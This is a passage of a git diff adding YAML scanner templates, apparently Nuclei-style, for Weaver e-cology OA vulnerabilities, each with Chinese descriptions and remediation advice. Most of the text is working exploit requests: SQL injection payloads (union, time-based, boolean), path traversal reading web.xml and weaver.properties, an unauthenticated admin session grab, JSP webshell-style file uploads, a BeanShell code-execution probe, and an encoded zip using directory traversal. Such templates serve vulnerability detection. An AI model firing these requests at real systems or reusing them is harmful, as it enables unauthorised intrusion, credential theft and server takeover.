1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'DriverClasses') + path: + - '{{BaseURL}}/weaver/weaver.file.SignatureDownLoad?markId=1%20union%20select%20%27..%2fecology%2fWEB-INF%2fprop%2fweaver.properties%27' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git "a/config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-users_data-Unauthorized.yaml" "b/config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-users_data-Unauthorized.yaml" new file mode 100755 index 000000000..becc4a9fe --- /dev/null +++ "b/config/51pwn/yaml/\346\263\233\345\276\256OA/Ecology-users_data-Unauthorized.yaml" @@ -0,0 +1,37 @@ +id: Ecology-users_data-Unauthorized +info: + name: 泛微 E-cology users.data 未授权访问漏洞 + author: + - 折跃 + description: |- + 泛微 E-cology users.data 未授权访问导致敏感信息泄露漏洞 + 泛微协同管理应用平台(e-cology)是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台,e-cology可形成一系列的通用解决方案和行业解决方案。 + + 泛微 E-cology中存在未授权访问漏洞。该漏洞源于网络系统或产品未正确限制来自未授权角色的资源访问,进而造成信息泄露问题。 + severity: medium + remediation: |- + 官方修复方案:: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.weaver.com.cn/ + + 临时修复方案: + 1、前后端同时对用户输入信息进行校验,双重验证机制。 + 2、调用功能前验证用户是否有权限调用相关功能。 + 3、去除页面中涉及的敏感信息或删除泄露信息页面 + 4、将敏感信息进行加密存储,非必要不可发送前端 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(base64_decode(body),'users') + - contains(base64_decode(body),'loginid') + path: + - '{{BaseURL}}/messager/users.data' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\346\263\233\345\276\256OA/Fangwei-OA-AdminLogin.yaml" "b/config/51pwn/yaml/\346\263\233\345\276\256OA/Fangwei-OA-AdminLogin.yaml" new file mode 100755 index 000000000..f139be43f --- /dev/null +++ "b/config/51pwn/yaml/\346\263\233\345\276\256OA/Fangwei-OA-AdminLogin.yaml" @@ -0,0 +1,23 @@ +id: Fangwei-OA-AdminLogin +info: + name: 泛微OA 管理员任意登录 + author: + - l0ne1y + description: |- + 泛微OA 管理员任意登录 + 泛微 OA 系统存在管理员任意登录漏洞,攻击者可利用未授权接口访问获取管理员Session,进而实现管理员任意登录。 + severity: high + remediation: |- + ## 官方修复方案 + 升级至最新版本。 + ## 临时修复方案 + 联系官方客服获取修复补丁。 +requests: +- matchers: + - type: word + words: + - sessionkey + path: + - '{{BaseURL}}/mobile/plugin/VerifyQuickLogin.jsp' + method: POST + body: identifier=1&language=1&ipaddress=127.0.0.1 diff --git "a/config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-arbitrary-fileUpload.yaml" "b/config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-arbitrary-fileUpload.yaml" new file mode 100755 index 000000000..1c81ec4e9 --- /dev/null +++ "b/config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-arbitrary-fileUpload.yaml" @@ -0,0 +1,39 @@ +id: ecology-arbitrary-fileUpload +info: + name: Ecology Arbitrary File Upload + author: + - l0ne1y + description: |- + ecology任意文件上传 + 在Web程序中,通常会涉及到一些文件上传的功能,如头像上传、图片上传、附件上传等,由于Web中间件会根据用户的请求去执行特定后缀的文件(asp、php、cgi、aspx、jsp等),如果在上传文件的功能中未限制上传文件的后缀,导致可以上传“asp、php、cgi、aspx、jsp、html”等后缀的执行文件时,那么攻击者可以利用此漏洞上传恶意的可执行文件来执行恶意的代码,比如文件读写、命令执行,这样即可直接控制服务器,例如:攻击者可上传恶意后门获取webshell。 + severity: high + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1 == 200 + - contains(body_2, "{{randomValue}}") && status_code_2 == 200 + matchers-condition: and + raw: + - | + POST /page/exportImport/uploadOperation.jsp HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFy3iNVBftjP6IOwo + + ------WebKitFormBoundaryFy3iNVBftjP6IOwo + Content-Disposition: form-data; name="file"; filename="{{fileName}}.jsp" + Content-Type: application/octet-stream + + <%out.print("{{randomValue}}");new java.io.File(application.getRealPath(request.getServletPath())).delete();%> + ------WebKitFormBoundaryFy3iNVBftjP6IOwo-- + - | + GET /page/exportImport/fileTransfer/{{fileName}}.jsp HTTP/1.1 + Host: {{Hostname}} + req-condition: true +variables: + fileName: '{{rand_char("abcdefghjkloerytu")}}' + randomValue: '{{rand_int(200000000, 210000000)}}' diff --git "a/config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-fileDownload-directoryTraversal.yaml" "b/config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-fileDownload-directoryTraversal.yaml" new file mode 100755 index 000000000..765d158ec --- /dev/null +++ "b/config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-fileDownload-directoryTraversal.yaml" @@ -0,0 +1,25 @@ +id: ecology-fileDownload-directoryTraversal +info: + name: 泛微文件下载目录遍历 + author: + - l0ne1y + description: |- + 泛微OA云桥任意文件读取和目录遍历漏洞 + 任意文件读取/下载漏洞不同于网站目录浏览,此漏洞不仅仅可遍历系统下web中的文件,而且可以浏览或者下载到系统中的文件,攻击人员通过目录遍历攻击可以获取系统文件及服务器的配置文件等等。一般来说,攻击者利用服务器API、文件标准权限进行攻击。任意文件读取/下载漏洞可能存在于Web服务器软件本身,也可能存在于Web应用程序之中,在该漏洞中攻击者可以通过返回内容识别程序运行路径从而下载数据库配置文件危害可见。 + severity: medium + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁。 +requests: +- matchers: + - type: word + part: body + words: + - /weaver/ + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml' + method: GET diff --git "a/config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-javabeanshell-rce.yaml" "b/config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-javabeanshell-rce.yaml" new file mode 100755 index 000000000..ebc11ac93 --- /dev/null +++ "b/config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-javabeanshell-rce.yaml" @@ -0,0 +1,35 @@ +id: ecology-javabeanshell-rce +info: + name: 泛微 E-cology OA远程代码执行漏洞 + author: + - l0ne1y + description: |- + 泛微 E-cology 远程代码执行漏洞 + 泛微协同管理应用平台(e-cology)是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台,e-cology可形成一系列的通用解决方案和行业解决方案。 + + 泛微 E-cology中存在代码执行漏洞,攻击者可利用该漏洞执行系统命令。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.weaver.com.cn/ + + 临时修复方案: + 1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。 + 2、在不影响业务的情况下可删除此页面或禁止外部访问。 +requests: +- matchers: + - type: word + part: body + words: + - '{{randomValue}}' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/weaver/bsh.servlet.BshServlet' + method: POST + body: bsh.script=print%28{{randomValue}}%29&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw +variables: + randomValue: '{{rand_int(40000, 44800)}}' diff --git "a/config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-springframework-directoryTraversal.yaml" "b/config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-springframework-directoryTraversal.yaml" new file mode 100755 index 000000000..3d0738b1f --- /dev/null +++ "b/config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-springframework-directoryTraversal.yaml" @@ -0,0 +1,25 @@ +id: ecology-springframework-directoryTraversal +info: + name: ecology Spring框架目录跨越 + author: + - l0ne1y + description: |- + ecology Spring框架版本目录跨越 + 目录遍历是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以是web根目录以外的文件),甚至执行系统命令,在该漏洞中攻击者可跨目录读取敏感文件。 + severity: medium + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁。 +requests: +- matchers: + - type: word + part: body + words: + - /weaver/ + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml' + method: GET diff --git "a/config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-syncuserinfo-sqli.yaml" "b/config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-syncuserinfo-sqli.yaml" new file mode 100755 index 000000000..fe11cb0a2 --- /dev/null +++ "b/config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-syncuserinfo-sqli.yaml" @@ -0,0 +1,26 @@ +id: ecology-syncuserinfo-sqli +info: + name: 泛微 OA SyncUserInfo SQL注入 + author: + - l0ne1y + description: |- + 泛微OA SyncUserInfo SQL注入 + SQL是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统,同时也是数据库脚本文件的扩展名。 + 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。 + 在泛微 OA SyncUserInfo 处存在SQL注入漏洞,攻击者可以利用该漏洞执行恶意 SQL 命令。 + severity: high + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁。 +requests: +- matchers: + - type: dsl + dsl: + - contains(body,randomValue) && !contains(body,"./SyncUserInfo.jsp?") && status_code==200 + matchers-condition: and + path: + - '{{BaseURL}}/mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str({{randomValue}}),null' + method: GET + req-condition: true +variables: + randomValue: '{{rand_int(40000, 44800)}}' diff --git "a/config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-v8-sqli.yaml" "b/config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-v8-sqli.yaml" new file mode 100755 index 000000000..db925886b --- /dev/null +++ "b/config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-v8-sqli.yaml" @@ -0,0 +1,27 @@ +id: ecology-v8-sqli +info: + name: 泛微e-cology8前台sql注入 + author: + - l0ne1y + description: |- + 泛微e-cology8前台sql注入 + SQL是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统,同时也是数据库脚本文件的扩展名。 + 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。 + 泛微ecology8是⼀款OA办公产品,但ecology8中存在前台SQL注⼊,可获取系统管理员密码hash。 + severity: high + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁。 +requests: +- matchers: + - type: word + part: body + words: + - '{{randomValue}}' + path: + - '{{BaseURL}}/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+{{randomValue}}+as+id' + method: GET + headers: + Host: '{{Hostname}}' +variables: + randomValue: '{{rand_int(200000000, 210000000)}}' diff --git "a/config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-v9-fileUpload.yaml" "b/config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-v9-fileUpload.yaml" new file mode 100755 index 000000000..f58ff5ae4 --- /dev/null +++ "b/config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-v9-fileUpload.yaml" @@ -0,0 +1,39 @@ +id: ecology-v9-fileUpload +info: + name: ecology OA V9 RCE via File Upload + author: + - l0ne1y + description: |- + ecology v9 任意文件上传 + 在Web程序中,通常会涉及到一些文件上传的功能,如头像上传、图片上传、附件上传等,由于Web中间件会根据用户的请求去执行特定后缀的文件(asp、php、cgi、aspx、jsp等),如果在上传文件的功能中未限制上传文件的后缀,导致可以上传“asp、php、cgi、aspx、jsp、html”等后缀的执行文件时,那么攻击者可以利用此漏洞上传恶意的可执行文件来执行恶意的代码,比如文件读写、命令执行,这样即可直接控制服务器,例如:攻击者可上传恶意后门获取webshell。 + severity: high + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - contains(body_2, "{{randomValue}}") + - status_code_2 == 200 + raw: + - | + POST /page/exportImport/uploadOperation.jsp HTTP/1.1 + Host: {{Hostname}} + Origin: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFy3iNVBftjP6IOwo + + ------WebKitFormBoundaryFy3iNVBftjP6IOwo + Content-Disposition: form-data; name="file"; filename="{{fileName}}.jsp" + Content-Type: application/octet-stream + + <%out.print({{randomValue}});%> + ------WebKitFormBoundaryFy3iNVBftjP6IOwo-- + - | + GET /page/exportImport/fileTransfer/{{fileName}}.jsp HTTP/1.1 + Host: {{Hostname}} + req-condition: true +variables: + fileName: '{{rand_base(5, "qwertyuiopasdfghjkl")}}' + randomValue: '{{rand_int(200000000, 210000000)}}' diff --git "a/config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-weaver_common-fileUpload.yaml" "b/config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-weaver_common-fileUpload.yaml" new file mode 100755 index 000000000..ea1ed9a36 --- /dev/null +++ "b/config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-weaver_common-fileUpload.yaml" @@ -0,0 +1,39 @@ +id: ecology-weaver_common-fileUpload +info: + name: 泛微OA weaver.common.Ctrl 任意文件上传 + author: + - l0ne1y + description: |- + 泛微OA weaver.common.Ctrl 任意文件上传 + 在Web程序中,通常会涉及到一些文件上传的功能,如头像上传、图片上传、附件上传等,由于Web中间件会根据用户的请求去执行特定后缀的文件(asp、php、cgi、aspx、jsp等),如果在上传文件的功能中未限制上传文件的后缀,导致可以上传“asp、php、cgi、aspx、jsp、html”等后缀的执行文件时,那么攻击者可以利用此漏洞上传恶意的可执行文件来执行恶意的代码,比如文件读写、命令执行,这样即可直接控制服务器。在本漏洞中攻击者通过漏洞可以上传webshell文件控制服务器。 + severity: high + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1 == 200 + - contains(body_2, "BugTest") && status_code_2 == 200 + matchers-condition: and + raw: + - |+ + POST /weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFy3iNVBftjP6IOwo + + ------WebKitFormBoundaryFy3iNVBftjP6IOwo + Content-Disposition: form-data; name="file"; filename="XasdaASA.zip" + Content-Type: application/zip + + {{shellcode}} + -----WebKitFormBoundaryFy3iNVBftjP6IOwo-- + + - | + GET /cloudstore/XasdaASA.txt HTTP/1.1 + Host: {{Hostname}} + req-condition: true +variables: + shellcode: '{{hex_decode(base64_decode("NTA0QjAzMDQxNDAwMDAwMDA4MDBEQTdCRDg1NDJGODIwQzY3MDkwMDAwMDAwNzAwMDAwMDE1MDAwMDAwMkUyRTJGMkUyRTJGMkUyRTJGNTg2MTczNjQ2MTQxNTM0MTJFNzQ3ODc0NzMyQTREMEY0OTJEMkUwMTAwNTA0QjAxMDIxNDAwMTQwMDAwMDAwODAwREE3QkQ4NTQyRjgyMEM2NzA5MDAwMDAwMDcwMDAwMDAxNTAwMDAwMDAwMDAwMDAwMDAwMDAwMDA4MDAxMDAwMDAwMDAyRTJFMkYyRTJFMkYyRTJFMkY1ODYxNzM2NDYxNDE1MzQxMkU3NDc4NzQ1MDRCMDUwNjAwMDAwMDAwMDEwMDAxMDA0MzAwMDAwMDNDMDAwMDAwMDAwMA=="))}}' diff --git "a/config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-workflowcentertreedata-sqli.yaml" "b/config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-workflowcentertreedata-sqli.yaml" new file mode 100755 index 000000000..07ae0a94a --- /dev/null +++ "b/config/51pwn/yaml/\346\263\233\345\276\256OA/ecology-workflowcentertreedata-sqli.yaml" @@ -0,0 +1,31 @@ +id: ecology-workflowcentertreedata-sqli +info: + name: 泛微OA e-cology WorkflowCenterTreeData前台接口SQL注入漏洞 + author: + - l0ne1y + description: |- + 泛微OA e-cology WorkflowCenterTreeData前台接口SQL注入漏洞 + 攻击者可在未经身份验证的情况下进行攻击,获得系统敏感数据。所有使用了Oracle数据库的泛微网站都有可能受到影响,且利用难度低,危害大(可获取密码等敏感信息),预计会对泛微的主要服务地区——中国市场产生一定冲击。 + 该漏洞是由于OA系统的WorkflowCenterTreeData接口中涉及Oracle数据库的SQL语句缺乏安全检查措施所导致的,任意攻击者都可借SQL语句拼接时机注入恶意payload,造成SQL注入攻击。目前官方尚未发布漏洞补丁,所有使用了Oracle数据库的泛微网站都有可能受到影响,请相关网站管理人员在官方发布补丁前及时下线网站。 + severity: high + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁。 +requests: +- matchers: + - type: word + part: body + words: + - '{{randomValue}}' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/mobile/browser/WorkflowCenterTreeData.jsp' + method: POST + body: node=wftype_1132232323231&scope=23332323&formids=1111111111111%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a)))union+select+1024,({{randomValue}})+order+by+(((1 + headers: + Content-Type: application/x-www-form-urlencoded +variables: + randomValue: '{{rand_int(200000000, 210000000)}}' diff --git "a/config/51pwn/yaml/\346\263\233\345\276\256OA/wooyun-2014-076418.yaml" "b/config/51pwn/yaml/\346\263\233\345\276\256OA/wooyun-2014-076418.yaml" new file mode 100755 index 000000000..818d971a7 --- /dev/null +++ "b/config/51pwn/yaml/\346\263\233\345\276\256OA/wooyun-2014-076418.yaml" @@ -0,0 +1,61 @@ +id: wooyun-2014-076418 +info: + name: 泛微 E-cology weaver.email.FileDownloadLocation fileid参数 SQL注入 + author: + - 折跃 + description: |- + 泛微 E-cology weaver.email.FileDownloadLocation fileid参数 SQL注入漏洞 + 泛微协同管理应用平台(e-cology)是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台,e-cology可形成一系列的通用解决方案和行业解决方案。 + + 泛微 E-cology中存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.weaver.com.cn/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 && status_code_2==200 + - (duration_2 - duration_1) >= 5 + - type: dsl + condition: and + dsl: + - status_code_3==200 && status_code_4==200 + - (duration_4 - duration_3) >= 5 + matchers-condition: or + path: + - '{{BaseURL}}/weaver/weaver.email.FileDownloadLocation?download=1&fileid=32' + - '{{BaseURL}}/weaver/weaver.email.FileDownloadLocation?download=1&fileid=32%20WAITFOR%20DELAY%20''0:0:5''' + - '{{BaseURL}}/weaver/weaver.email.FileDownloadLocation?download=1&fileid=32' + - '{{BaseURL}}/weaver/weaver.email.FileDownloadLocation?download=1&fileid=32%20AND%209285=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(83)||CHR(81)||CHR(70),5)' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - (body_1 == body_2) && (body_2 != body_3) + path: + - '{{BaseURL}}/weaver/weaver.email.FileDownloadLocation?download=1&fileid=-2' + - '{{BaseURL}}/weaver/weaver.email.FileDownloadLocation?download=1&fileid=-2%20or%201=1' + - '{{BaseURL}}/weaver/weaver.email.FileDownloadLocation?download=1&fileid=-2%20or%201=2' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git "a/config/51pwn/yaml/\346\263\233\345\276\256OA/wooyun-2014-076547.yaml" "b/config/51pwn/yaml/\346\263\233\345\276\256OA/wooyun-2014-076547.yaml" new file mode 100755 index 000000000..9c3c0d7e1 --- /dev/null +++ "b/config/51pwn/yaml/\346\263\233\345\276\256OA/wooyun-2014-076547.yaml" @@ -0,0 +1,56 @@ +id: wooyun-2014-076547 +info: + name: 泛微e-cology upload.jsp 任意文件上传漏洞检测 + author: + - 折跃 + description: |- + 泛微 E-cology upload.jsp 任意文件上传漏洞 + 泛微协同管理应用平台(e-cology)是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台,e-cology可形成一系列的通用解决方案和行业解决方案。 + + 泛微 E-cology中存在任意文件上传漏洞。远程攻击者可以利用该漏洞上传文件并执行代码。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.weaver.com.cn/ + + 临时修复方案: + 1、服务器端将文件上传目录直接设置为不可执行。 + 2、文件类型检查:建议使用白名单方式(比黑名单更可靠),并结合MIME Type、后缀检查等方式(文件类型做白名单限制)。此外对于图片的处理可以使用压缩函数或resize函数,处理图片的同时破坏其包含的HTML代码。 + 3、使用随机数改写文件名和文件路径,使得用户不能轻易访问自己上传的文件。 + 4、单独设置文件服务器的域名。 + 5、验证文件内容,使用正则匹配恶意代码(过滤恶意代码各种绕过方式,如大小写、BASE64编码)限制上传。 + 6、修复服务器可能存在的解析漏洞。 + 7、严格限制可以修改服务器配置的文件上传如:.htaccess。 + 8、隐藏上传文件路径。 + 9、及时修复Web上传代码。 + 10、不能有本地文件包含漏洞。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 + - status_code_2==200 + - contains(body_2,verify) + raw: + - | + POST /tools/SWFUpload/upload.jsp HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------17911526049915903093347900923 + + -----------------------------17911526049915903093347900923 + Content-Disposition: form-data; name="test"; filename="{{fileName}}.jsp" + Content-Type: application/octet-stream + + <%@ page import="java.util.*,java.io.*" %> + <%@ page import="java.io.*"%> + <% out.println("{{verify}}");%> + -----------------------------17911526049915903093347900923 + - | + GET /null{{uploadFile}}.jsp HTTP/1.1 + Host: {{Hostname}} + req-condition: true +variables: + fileName: '{{rand_text_alphanumeric(8,"")}}' + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\346\263\233\345\276\256OA/wooyun-2015-0125638_2.yaml" "b/config/51pwn/yaml/\346\263\233\345\276\256OA/wooyun-2015-0125638_2.yaml" new file mode 100755 index 000000000..175050702 